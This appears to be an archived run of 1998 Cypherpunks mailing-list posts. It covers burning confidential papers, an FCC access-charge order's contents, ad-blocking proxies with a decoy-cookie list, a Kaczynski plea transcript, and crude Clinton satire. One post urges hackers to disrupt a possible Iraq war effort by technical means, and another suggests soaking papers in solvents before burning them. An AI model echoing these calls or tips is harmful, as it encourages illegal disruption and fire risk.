Subject: Document destruction services (fwd)
Message-ID: <199801241540.JAA19472@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Igor,

Forwarded message:

> Subject: Document destruction services
> Date: Sat, 24 Jan 1998 09:36:54 -0600 (CST)
> From: ichudov@algebra.com (Igor Chudov @ home)

> I have a box of confidential papers that I do not need. I would prefer not
> to just throw them away, but to either shred or incinerate them. Due to
> the sheer size of the box, it is not practical for me to buy and use a home
> shredder. Would anyone have a suggestion as to what is the best way to
> destroy them? Aer there any services that do it inexpensively?

Ask one of your friends with a fireplace to help out. Just remember to stire
the ashes when done. Otherwise it's possible using IR sensing to read the
ink on larger pieces of the paper. A bar-b-q pit is also a very good means.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 25 Jan 1998 00:07:36 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: FCC sets new access rates - ISP's escape inter-state tariff - Congestion argument denied
Message-ID: <199801241559.JAA19539@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.fcc.gov/ccb/access/fcc97158.html

>    Federal Communications Commission
>    navigation bar with links to FCC Homepage, Search, Commissioners,
>    Bureaus/Offices, and Finding Information
>    
>    HTML Format
>    
>    
>    FCC 97-158
>    
>    First Report & Order In the Matter of
>    Access Charge Reform
>    Price Cap Performance Review for Local Exchange Carriers
>    Transport Rate Structure and Pricing
>    Usage of the Public Switched Network by Information Service and
>    Internet Access Providers 
>      _________________________________________________________________
>    
>    Text Version | WordPerfect Version | Acrobat Version | News Release |
>    Errata
>    
>    
>    
>    
>    Table of Contents
>    links to HTML files
>    
>    These files do not contain the changes specified in the 6/4/97 Errata!
>    
>    
>    TITLE PAGE
>           
>    I. Introduction 1
>           A. Background 17
>           
>         
>                 1. The Existing Rate System 17
>                 2. Implicit Subsidies in the Existing System 28
>                 3. The Telecommunications Act of 1996 32
>                 
>    
>           B. Access Charge Reform 35
>           
>         
>                 1. Rationalizing the Rate Structure 36
>                 2. Baseline Rate Level Reductions 42
>                 
>    
>           
>    II. Summary of Rate Structure Changes and Transitions 53
>           A. Common Line Rate Structure Changes 54
>           B. Other Rate Structure Changes 61
>           
>    III. Rate Structure Modifications 67
>           A. Common Line 67
>           
>         
>                 1. Overview 67
>                 2. Subscriber Line Charge 72
>                 3. Carrier Common Line Charge 88
>                 4. Common Line PCI Formula 106
>                 5. Assessment of SLCs and PICCs on Derived Channels 111
>                 
>    
>           B. Local Switching 123
>           
>         
>                 1. Non-Traffic Sensitive Charges 123
>                 2. Traffic Sensitive Charges 136
>                 
>    
>           C. Transport 150
>           
>         
>                 1. Entrance Facilities and Direct-Trunked Transport 152
>                 2. Tandem-Switched Transport 158
>                 
>    
>           D. Transport Interconnection Charge (TIC) 210
>           
>         
>                 1. Background 210
>                 2. Discussion 212
>                 
>    
>           E. SS7 Signalling 244
>           
>         
>                 1. Background 244
>                 2. Discussion 252
>                 
>    
>           F. Impact of New Technologies 256
>           
>    IV. Baseline Rate Levels 258
>           A. Primary Reliance on a Market-Based Approach With A
>           Prescriptive Backdrop and the Adoption of Several Initial
>           Prescriptive Measures 258
>           
>         
>                 1. Background 258
>                 2. Discussion 262
>                 
>    
>           B. Prescriptive Approaches 285
>           
>         
>                 1. Prescription of a New X-Factor 285
>                 2. Rejection of Certain Prescriptive Approaches 287
>                 
>    
>           C. Equal Access Costs 299
>           
>         
>                 1. Background 299
>                 2. Discussion 302
>                 
>    
>           D. Correction of Improper Cost Allocations 315
>           
>         
>                 1. Marketing Expenses 315
>                 2. General Support Facilities 326
>                 
>    
>           
>    V. Access Reform For Incumbent Rate-of-Return Local Exchange Carriers
>           329
>           A. Background 329
>           B. Discussion 330
>           
>    VI. Other Issues 336
>           A. Applicability of Part 69 to Unbundled Elements 336
>           
>         
>                 1. Background 336
>                 2. Discussion 337
>                 
>    
>           B. Treatment of Interstate Information Services 341
>           
>         
>                 1. Background 341
>                 2. Discussion 344
>                 
>    
>           C. Terminating Access 349
>           
>         
>                 1. Price Cap Incumbent LECs 350
>                 2. Non-Incumbent LECs 358
>                 3. "Open End" Services 365
>                 
>    
>           D. Universal Service-Related Part 69 Changes 367
>           
>         
>                 1. Background 368
>                 2. Discussion 372
>                 
>    
>           E. Part 69 Allocation Rules 388
>           
>         
>                 1. Background 388
>                 2. Discussion 389
>                 
>    
>           F. Other Proposed Part 69 Changes 390
>           
>         
>                 1. Background 390
>                 2. Discussion 391
>                 
>    
>           
>    VII. Further Notice of Proposed Rulemaking 397
>           A. PICCs for Special Access Lines 397
>           
>         
>                 1. Background 398
>                 2. Proposal 403
>                 
>    
>           B. General Support Facilities Costs 407
>           
>         
>                 1. Background 408
>                 2. Proposal 412
>                 
>    
>           
>    VIII. Final Regulatory Flexibility Analysis 419
>           
>    IX. Procedural Issues 441
>           
>    X. Ordering Clauses 459
>           
>    Appendix A List of Commenters
>           
>    Appendix B Comment Summary
>           
>    Appendix C Final Rules
>           
>    STATEMENTS
>           Commissioner Quello
>           Commissioner Ness
>           Commissioner Chong
>           
>           
>           
>           
>           View/Download single-file HTML version of Entire Report
>           
>           
>           
>           
>      Pagination of the documents contained in these files may not match
>      that of the Official Paper Version when viewed or printed using your
>      system.
>      
>    
>           
>           navigation bar with links to FCC Homepage, Search,
>           Commissioners, Bureaus/Offices, and Finding Information
>           
>           
>           last updated 6/9/97
> 


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Jan 1998 02:09:34 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: Document destruction services (fwd)
In-Reply-To: <199801241720.LAA19990@einstein.ssz.com>
Message-ID: <v03102802b0efdd39ab66@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:40 AM -0800 1/24/98, Igor Chudov @ home wrote:

>Jim, try it. I am sure that adding alcohol will not help much, but will
>make it a fire hazard.
>
>Can one buy concentrated sulfuric acid in this country without being
>stormed by jackbooted thugs? I think that I'll need a couple of gallons.
>To that I'll need about teh same amount of chalk-like material to
>neutralize it after the deed is done.
>
>	- Igor.

Come on, Igor, just go out and make a bonfire. I can't see why this is
turning into a major thread, "How Igor can burn a box of documents."

As for buying H2SO4, of _course_ one can buy it! But it's a really dumb way
to destroy some papers.

Just burn them. I don't get what the problem is.

(And don't repeat that they are "hard to burn." Unless they are made of
some other than paper, which is doubtful, they will burn.)

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 24 Jan 1998 17:19:53 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
In-Reply-To: <v03102800b0ef0154981a@[207.167.93.63]>
Message-ID: <199801240913.KAA18772@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> But I had been marveling at how the Clinton troubles were being
> ignored by the Cypherpunks...

I've been too amused by the proceedings to comment on it.

The more important silence is about the instant sentencing of the
Unabomber compared to Jim Bell's sentencing.  What _is_ happening with
Jim?

> It would have been interesting to see the whole process leading up to
> Clinton's resignation (next week?) pass without any discussion by us.

> (Actually, I threw in an aside yesterday about "President Gore," but no one
> picked up on it.)

I saw that.  There are rumors floating about that they have the goods
on Gore too, his hands are certainly as dirty as Slick Willie's.  I'd
like to see both of those rat bastards disgraced.  After all the
vitriol Klinton & Algore have thrown at the '80s and Republicans
their Karma demands they be succeeded by Newt Gengrich (and live to
see it).


> Personally, I think having a crippled and ineffective President is better
> than having an activist bozo President Gore, so I'm kind of hoping this
> whole affairs takes several more months to unwind.

Or several years, or whatever ... :-)  I definitely agree.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 25 Jan 1998 02:08:45 +0800
To: cypherpunks@toad.com
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <199801240418.FAA17881@basement.replay.com>
Message-ID: <5DiTJe33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@REPLAY.COM (Anonymous) writes:
> Tim, I'm surprised. WebFree for the Macintosh does this very thing. It
> matches on URL substrings and simply removes these things wholesale from
> your browser window. No broken image boxes, nothing. It also kills cookies
> and stops animated GIFs from leaking through, if you want to nuke either of
> those things.

Of course, the person putting up the web page might well argue that you're
violating his copyright in some bizarre way.  The image on your screen with
the ad banners stripped is not what the author intended; especially if you're
helping third parties to strip ads. IANAL... thoughts?

I occasinally use the Altavista search engine in text mode
(www.altavista.digital.com) and it has ads (for amazon.com) right in the
middle of the text, in the same html file as the search results.
I suppose the next logical step in the anti-ad proxy is to edit the dynamically
edit the incoming html and to delete or replaces specified strings; perhaps
a while "intelligent agent" that will filter in only the information you've
requested, keeping out *all* the graphics and other crud.

While I was researching this subject, I came across a web page of some
student at Rutgers. It displays 4 advertizing banners and uses java/javascript
(obnoxious technologies that I disable) to make sure that you've clicked
all 4 (presumably he gets some credit for it); only after the javascript is
convinced that you've clicked the ad banners can you get in. Yeah, right.
But if ad filtering becomes more commonplace in the future, i can imagine
crypto being (mis)used to enforce ad viewing: "You no clicky my sponsor ads,
you no see my content."

I disagree with whoever said that the technology for deleting ads is the
same as the technology for deleting porn. Porn publishers very much don't
want their content to reach minors or anyone who's offended by it, and
mostly coopereate with rating agencies.  Porn isn't generally mixed with
desirable content on the same pages. You can just block the entire page
containing some porn (or, with vancouver-webpages' pics ratings you can
block pages containing "disparaging remarks about the environment", kewl).
Advertisers don't give a damn if their ads are seen by those who aren't
interested in them, and will use technology to make it harder for you to
filter out their ads (or to get to the content without seeing sponsor ads).

When MS IE 3.0 first came out, it supported pics ratings. So I got very
excited and wrote my own little pics ratings server (a better ones is
available from wc3, by the way) to filter out banner ads. Unfortunately,
after I wrote it and started testing t, I doscovered that IE 3.0 only
asks the pics server about eh top-level page; it does NOT ask the pics
server about the urls references in "IMG SRC=" and the like. I guess
the reasoning is that if the top-level page is acceptable, than anything
embedded on it is acceptable, which may be true about porn but not true
about ads.

Overall, this whole advertiser-sponsored model sucks. I'd rather be paying
(electronic cash, of course) for the resources I use.

> The URL is: http://www.falken.net/webfree/
>
> Junkbusters (http://www.junkbusters.com/) offers a personal proxy server
> kind of thing that lets you mash just about everything: HTTP headers, user
> agent info, referer URL, cookies, etc. It runs on either NT or Unix variants.

It runs udner OS/2 too!! I've got it to work under NT. it may work under
Win95 as well. (Anyone wants an executable for M$ platforms?)

> One could also use it to get around a firewall configured to reject
> non-standard browsers, but That Would Be Wrong, as Nixon once said. It lets
> you specify which sites or substrings to look for, and which ones you trust.

I've been using junkbstr and am pretty happy with it. One disadvantage of
using any proxy server, as opposed to filtering in the browser, is that the
browse is one step removed from the TCP/IP.  E.g. if you try to connect
to a non-existent domain without a proxy, the browser goes to DNS and tells
you that it can't resolve it. Going via a proxy, the proxy server goes to
DNS and sends a page back to the browser sayng it couldn't resolve it, which
isn't as clean.

Although I'm not doing it much, the following worked out fine for me:
junkbuster running on an NT box connected to the internet via ppp; browsers
running on 4 win95 boxes connected to the NT box via ethernet, using
the NT box as the proxy server.

I've exchanged e-mail with someone about the list of URL patterns to block...
I have no time for this myself, but someone ought to put up a web page
tracking what ad urls people block. That would be a nice public service.

> It also does proxy chaining.

It would be nice to have it chain automatically through more than one proxy.

Another nice little feature of junkbstr is it ability to send "wafers" -
your own cookies, which will hopefully confuse whatever tracking software
exists on the server.  I send noise with the following wafers:

NOTICE=Please send no cookies
AnonTrack=X
Apache=X
ASPSESSIONID=X
CFID=X
CFTOKEN=X
DOL=X
DTRACK=X
EGSOFT_ID=X
GeoId=X
GeoStitial=X
group_discount_cookie=T
GTUID=00.00000.0.0.0000.0000
ink=X
JEB2=X
MC1=ID=X
p_uniqid=X
PFUID=X
registered=YES
RMID=X
s_uniqid=X
session-id-time=X
session-id=X
SWID=X
UID=X
Urid=X
userid=X

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sun, 25 Jan 1998 01:15:20 +0800
To: tcmay@got.net (Tim May)
Subject: Re: Document destruction services
In-Reply-To: <v03102801b0efc924f38f@[207.167.93.63]>
Message-ID: <199801241709.LAA04622@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Tim May wrote:
> >I have a box of confidential papers that I do not need. I would prefer not
> >to just throw them away, but to either shred or incinerate them. Due to
> >the sheer size of the box, it is not practical for me to buy and use a home
> >shredder. Would anyone have a suggestion as to what is the best way to
> >destroy them? Aer there any services that do it inexpensively?
> 
> Just burn them, either in a fireplace, since it's winter, or in a 55-gallon
> drum.

This kind of paper does not burn very well. I have tried it. Burning it
in my fireplace will take forever. A drum is an option though.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 25 Jan 1998 01:24:40 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Document destruction services (fwd)
Message-ID: <199801241720.LAA19990@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Igor,

Forwarded message:

> Subject: Re: Document destruction services
> Date: Sat, 24 Jan 1998 11:09:36 -0600 (CST)
> From: ichudov@Algebra.COM (Igor Chudov @ home)

> This kind of paper does not burn very well. I have tried it. Burning it
> in my fireplace will take forever. A drum is an option though.

Is the additive to the paper alcohol soluble? If so soak it in alcohol for a
few minutes, say a half hour, and then burn it. Should go quite well.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sun, 25 Jan 1998 01:48:53 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: Document destruction services (fwd)
In-Reply-To: <199801241720.LAA19990@einstein.ssz.com>
Message-ID: <199801241740.LAA04906@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> Forwarded message:
> 
> > Subject: Re: Document destruction services
> > Date: Sat, 24 Jan 1998 11:09:36 -0600 (CST)
> > From: ichudov@Algebra.COM (Igor Chudov @ home)
> 
> > This kind of paper does not burn very well. I have tried it. Burning it
> > in my fireplace will take forever. A drum is an option though.
> 
> Is the additive to the paper alcohol soluble? If so soak it in alcohol for a
> few minutes, say a half hour, and then burn it. Should go quite well.

Jim, try it. I am sure that adding alcohol will not help much, but will
make it a fire hazard.

Can one buy concentrated sulfuric acid in this country without being
stormed by jackbooted thugs? I think that I'll need a couple of gallons.
To that I'll need about teh same amount of chalk-like material to
neutralize it after the deed is done.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 25 Jan 1998 03:45:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Executing Kaczynski
In-Reply-To: <Pine.BSF.3.91.980124112441.28084A-100000@gabber.c2.net>
Message-ID: <3.0.2.32.19980124114351.0072c3c8@pop.sirius.com>
MIME-Version: 1.0
Content-Type: text/plain



>The more important silence is about the instant sentencing of the
>Unabomber compared to Jim Bell's sentencing.  What _is_ happening with
>Jim?

Kaczynski was not sentenced immediately - but the crimes he plead guilty to
and the legal posture of the prosecution (e.g., the withdrawn notice of
intent to seek the death penalty) make his sentence a foregone conclusion.
He is still, however, subject to the same pre-sentencing rigamarole that
Jim was; see, for example, this excerpt from the transcripts of the court
proceeding on 1/22 - (at
<http://cnn.com/SPECIALS/1997/unabomb/transcripts/9801/012298.txt>).

 9THE COURT:  Okay.  There will be a special assessment of
 
10   $650 imposed for your guilty plea pursuant to federal law.
 
11Mr. Kaczynski, do you understand those possible
 
12   consequences of your plea?
 
13THE DEFENDANT:  Yes, Your Honor.
 
14THE COURT:  Under the Sentencing Reform Act of 1984, the
 
15   United States Sentencing Commission has issued guidelines for
 
16   judges to follow in determining the sentence in a criminal
 
17   case.  Have you and your attorneys talked about how the
 
18   Sentencing Commission guidelines might apply to your case?
 
19(Discussion off the record between the defendant,
 
20   Ms. Clarke and Mr. Denvir.)
 
21THE DEFENDANT:  Yes, Your Honor.
 
22THE COURT:  Do you understand that the Court will not be
 
23   able to determine the guideline sentence for your case until
 
24   after the pre-sentence report has been completed and your
 
25   attorney and the Government have had an opportunity to object
 
 
 
     SUSAN VAUGHAN, CSR No. 9673 -- (916) 446-1347
 
 
 
3810
 
 1   to any of the findings in that report?
 
 2THE DEFENDANT:  Yes, Your Honor.
 
 3THE COURT:  Do you understand that after it has been
 
 4   determined what guideline applies to a case, the judge has the
 
 5   authority in some circumstances to impose a sentence that is
 
 6   more severe or less severe than the sentence called for by the
 
 7   guidelines?
 
 8THE DEFENDANT:  Yes, Your Honor.
 
 9THE COURT:  How about the question of appeal?  Has that
 
10   been waived?
 
11MR. LAPHAM:  Yes, Your Honor.  It's contained at page 7,
 
12   beginning at line 16.
 
13THE COURT:  Okay.  Do you understand that by entering
 
14   into the plea agreement you have entered with the Government,
 
15   you will have waived or given up your right to appeal all or
 
16   any part of your plea of guilty and anything else that occurs
 
17   during this conviction hearing and anything that occurs during
 
18   your sentencing hearing?
 
19THE DEFENDANT:  Yes, Your Honor.
 
20THE COURT:  Do you understand that parole has been
 
21   abolished and that if you plead guilty, you will spend the
 
22   rest of your life in prison and you will never be released or
 
23   paroled?
 
24THE DEFENDANT:  I understand that, Your Honor.
 
25THE COURT:  Do you understand that if the sentence is
 
 
 
     SUSAN VAUGHAN, CSR No. 9673 -- (916) 446-1347
 
 
 
3811
 
 1   more severe than you expected, you will still be bound by your
 
 2   plea and will have no right to withdraw it?
 
 3THE DEFENDANT:  I understand it, Your Honor.
 
 4THE COURT:  Do you understand that if I do not accept
 
 5   the sentencing recommendation in your plea agreement, you will
 
 6   still be bound by your plea and will have no right to withdraw
 
 7   it?
 
 8THE DEFENDANT:  I understand that, Your Honor.

[...]
--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | Export jobs, not crypto.
http://www.io.com/~gbroiles | http://www.parrhesia.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 25 Jan 1998 01:56:17 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Document destruction services (fwd)
Message-ID: <199801241749.LAA20147@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Document destruction services (fwd)
> Date: Sat, 24 Jan 1998 11:40:01 -0600 (CST)
> From: ichudov@algebra.com (Igor Chudov @ home)

> > > This kind of paper does not burn very well. I have tried it. Burning it
> > > in my fireplace will take forever. A drum is an option though.
> > 
> > Is the additive to the paper alcohol soluble? If so soak it in alcohol for a
> > few minutes, say a half hour, and then burn it. Should go quite well.
> 
> Jim, try it. I am sure that adding alcohol will not help much, but will
> make it a fire hazard.

I have Igor, works pretty well for some paper additives. If it's a plastic
base then use finger nail polish remover or model cement thinner.

How in the hell can you say with a straight face burning paper with alcohol
is any more a fire hazard then burning paper? You don't burn the paper while
it's in the alcohol bath, but remove it and then burn it. If you try to burn
it in the bath what you get is just like gasoline. The fumes burn not the
alcohol itself so the paper doesn't get nearly hot enough to do any good.

You're making burning paper, additives or not, a lot more complicated than
it is.

If you're that worried about it go down to your hardware store and buy a
hand-held torch. Additives or not that will burn it.

Good luck.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Jan 1998 04:09:59 +0800
To: Declan McCullagh <declan@pathfinder.com>
Subject: "Blowjobs for Jobs"   (Re: Sucking Sound...)
In-Reply-To: <v03102800b0ef0154981a@[207.167.93.63]>
Message-ID: <v03102803b0eff5c16eea@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



AP, Washington.  President Clinton today announced his "Blowjobs for Jobs"
program, open to young interns, wealthy socialites, and Hollywood
actresses. Clinton denied that this would be either improper behavior,
adultery, or abuse of his official powers. "Hell, it ain't adultery, as
Hillary would rather have me gettin' my oil changed in the Oval Office
bathroom than do it herself, and it ain't abuse, cuz that's why I'm havin'
these young thangs do it instead of it doin' it myself. I ain't no prevert."
...


At 11:35 AM -0800 1/24/98, Declan McCullagh wrote:
>Tim is right to bring this up. It will have immense impact on the issues
>the cypherpunks care about. How can Clinton talk about policy proposals
>(crypto, Net-taxes, etc.) when his presidency is spiraling away?

Well, actually it was Jonathan Wienke who brought it up...I just commented
on it.

I suppose one reason I hadn't attempted to write anything on it is that
there was just SO MUCH STUFF on it. New details are emerging hourly, and we
haven't even heard what's on the 20 hours of tape.

Yes, it's a massively covered story. Is it overcovered? I don't think so.
After all, the election campaign will generate 15 minutes of news coverage
on the network news shows each and every day for almost 10 months, so why
not this level of coverage for what looks to be the end of Clinton's
Presidency? (With all that that implies for further loss of confidence in
the democratic system (yay!).)

There are some who are steadfastly saying "But Clinton has denied these
charges." and "Let's wait until all the details come out."

These folks appear to be either in denial or are just going through the
motions. A vast amount of interesting evidence is accumulating, giving
support to various serious charges. If they are roughly as we are hearing,
modulo some possibly miscommunicated details, then Clinton and others are
in deep shit.

(Perjury, subornation of perjury, witness tampering, obstruction of
justice, and possibly offering Lewinsky and others jobs if they'll lie,
itself a misuse of office.)

I could go on, mentioning all the various news items.

(I get CNN, CNBC, all the usual networks, MSNBC, Fox News, and so on, so
there is a vast amount of news and analysis I hear.)

>At the daily press briefing yesterday, McCurry tried to talk about some
>welfare plan or something. Whatever. Doesn't matter what it was; I don't
>remember -- point is you don't see it on the front page of newspapers today.

I watched this live. McCurry is clearly not being informed on details.
(Which he's probably just as happy about, as elsewise he could be
subpoenaed as a material witness.)

>Note the grand jury is set to meet next Tues, not coincidentally, the day
>of the SoUA. A week ago everyone was scrambling to find out what was going
>to be in it. Nobody cares anymore. I may sit in on it in the press gallery
>just to see the dynamic and hear the catcalls.

It is a feeding frenzy, that much is for sure. But it's having the effect
of triggering more revelations...like the oral sex. phone sex, four other
women, etc. revelations.

(Hey, when those tapes of Clinton having phone sex with Lewinsky come
out...no pun intended...those will be heady times, snicker snicker.)



>Where I work, most of the folks are liberals. Before this week, they lent
>scant credence to Paula Jones etc. -- the previous Bimbo Eruptions. This
>time is different. This time there is serious talk of impeachment: what the
>legal standards are, what the Republicans are doing on the Hill, what this
>means for Gore.
>
>This time, it's for real.
Yep. He's going down.

(No pun intended, as it appears the "servicing" of him in the White House
was strictly in the other direction. Clinton and his "Blowjobs for Jobs"
program.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sun, 25 Jan 1998 02:17:16 +0800
To: tcmay@got.net (Tim May)
Subject: Re: Document destruction services (fwd)
In-Reply-To: <v03102802b0efdd39ab66@[207.167.93.63]>
Message-ID: <199801241810.MAA05227@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Tim May wrote:
> Come on, Igor, just go out and make a bonfire. I can't see why this is
> turning into a major thread, "How Igor can burn a box of documents."
> 
> As for buying H2SO4, of _course_ one can buy it! But it's a really dumb way
> to destroy some papers.
> 
> Just burn them. I don't get what the problem is.
> 
> (And don't repeat that they are "hard to burn." Unless they are made of
> some other than paper, which is doubtful, they will burn.)

Okay, I will try burning it tonight. Will let you know how it works.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 25 Jan 1998 01:58:09 +0800
To: cypherpunks@toad.com
Subject: Re: Executing Kaczynski
In-Reply-To: <v03102800b0efc2f9809e@[207.167.93.63]>
Message-ID: <c0NTJe42w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> BTW, Kaczynski is apparently no crazier that any number of Cypherpunks I
> have met, including myself. Recall that a leading Cypherpunk was suspected
> for a while as being the Unabomber.

Never trust a math PhD.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Jan 1998 05:12:47 +0800
To: cypherpunks@Algebra.COM
Subject: Clinton needs a war with Iraq
Message-ID: <v03102800b0f007a3850a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




There are increasing reports, from Washington and Baghdad, that Clinton
wants a nice little war action in Iraq, which would have the side effect of
boosting his support...or so he hopes.

If this happens, it may be time for hackers to use technical means to
disrupt the war effort.


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Sun, 25 Jan 1998 06:12:51 +0800
To: cypherpunks@cyberpass.net
Subject: Technology: R.I.P.
Message-ID: <v03102800b0f0080084c7@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



A great article in today's Wired News Daily, by Virginia Postrel, eloquently explains why D.C. wonks are incapable even considering of any meaningful changes to the role or size of governent.

http://www.wired.com/news/news/politics/story/9566.html

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 25 Jan 1998 02:41:15 +0800
To: cypherpunks@toad.com
Subject: Re: Sucking Sound...
In-Reply-To: <v03102800b0ef0154981a@[207.167.93.63]>
Message-ID: <ZZPTJe45w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> But I had been marveling at how the Clinton troubles were being ignored by
> the Cypherpunks...I figured we were all so jaded about government and the
> criminals who flourish in Washington that there was no point in commenting
> on this latest revelation of corruption. (The apparent perjury, suborning
> perjury, and witness-tampering, not the affair with Lewinsky, however
> tawdry it was.)

The whole Washington crowd is making itself obsolete and irrelevant.

Sure they can cause great problem for an occasional victim, but if you're
lucky enough to stay out fo their way, then it doesn't matter if it's
criminal Clinton or crimnal Gore or some republican criminal.

---

Dr.Dimitri Vulis KOTM
